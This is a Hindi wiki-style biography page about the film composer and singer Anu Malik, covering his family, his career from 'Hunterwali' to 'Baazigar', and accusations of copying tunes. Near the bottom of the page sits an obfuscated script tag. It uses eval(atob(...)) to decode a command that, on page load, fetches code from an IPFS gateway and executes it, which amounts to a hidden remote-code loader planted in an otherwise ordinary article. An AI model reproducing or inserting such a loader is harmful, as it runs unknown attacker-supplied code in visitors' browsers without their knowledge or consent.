अनु मलिक

भारत डिस्कवरी प्रस्तुति
Revision as of 07:57, 30 March 2021 by रविन्द्र प्रसाद (talk | contribs) ('thumb|250px|अनु मलिक '''अनवर सरदार मलिक''' (अंग्...' के साथ नया पृष्ठ बनाया)
(diff) ← Older revision | Latest revision (diff) | Newer revision → (diff)
Jump to navigation Jump to search

thumb|250px|अनु मलिक अनवर सरदार मलिक (अंग्रेज़ी: Anwar Sardar Malik, जन्म- 2 नवंबर, 1960) भारतीय फिल्म संगीतकार और गायक हैं। वह हिंदी सिनेमा के मशहूर गायकों में से एक हैं। उन्होंने हिंदी सिनेमा को कई बेहतरीन और सुपरहिट गाने दियें हैं। अनु मलिक 'राष्ट्रीय फिल्म पुरस्कार' और 'फिल्मफेयर पुरस्कार' विजेता संगीत निर्देशक हैं, जो मुख्य रूप से हिन्दी फिल्म उद्योग में काम करते हैं। सन 1990 के दशक में वह कई सफल फिल्मों के गाने संगीतबद्ध कर चुके हैं। संगीत निर्देशक के रूप में उन्होंने फिल्मों के विभिन्न शैलियों के लिए संगीत बनाया है।

परिचय

अनु मलिक का जन्म 2 नवंबर, 1960 को पंजाब में हुआ था। उनके पिता सर्द मालिक एक गीतकार और संगीत निर्देशक थे। सात साल की उम्र से ही अनु मलिक की संगीत में रूचि जाग्रत हुई और उन्होंने अपने पिता की सह में संगीत शुरू कर दिया। अनु मलिक का विवाह अंजू मालिक से हुआ। उनकी दो बेटियां हैं। उनकी एक बेटी अनमोल मलिक हिंदी सिनेमा में पार्श्वगायन करती हैं।

कॅरियर

अनु मलिक ने अपने कॅरियर की शुरुआत साल 1977 में फिल्म 'हंटरवाली' से की थी। इसके बाद उन्होंने हिंदी सिनेमा की कई सुपरहिट फिल्मों में संगीत दिया। साल 1993 में अनु मलिक को हिंदी सिनेमा में पहचान फिल्म महेश भट्ट की फिल्म 'बाजीगर' से मिली। 'बाजीगर' का गाना 'ये काली काली आँखें' उस समय सबसे ज्यादा हिट साबित हुआ था।

उसके बाद आने वाले समय में उन्होंने कई बेहतरीन फिल्मों में अपनी आवाज दी और संगीत दिया जो सुपरहिट साबित हुआ। जिस कारण से वह हिंदी सिनेमा में रातों-रात स्टार बन गए। जैसे-जैसे अनु मलिक कामयाबी की सीढ़ी चढ़ते गए, वैसे ही विवादों में भी घिरने लगे। उन पर लोगों ने आरोप लगाया कि वह दूसरे की धुनें चुराते हैं। लेकिन अनु मलिक ने कभी भी इन सब चीजों का अपने काम पर असर नहीं पड़ने दिया और हिंदी सिनेमा को अच्छे-अच्छे गाने दिए।


पन्ने की प्रगति अवस्था
आधार
प्रारम्भिक
माध्यमिक
पूर्णता
शोध

टीका टिप्पणी और संदर्भ

संबंधित लेख

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

वर्णमाला क्रमानुसार लेख खोज

                              अं                                                                                                       क्ष    त्र    ज्ञ             श्र   अः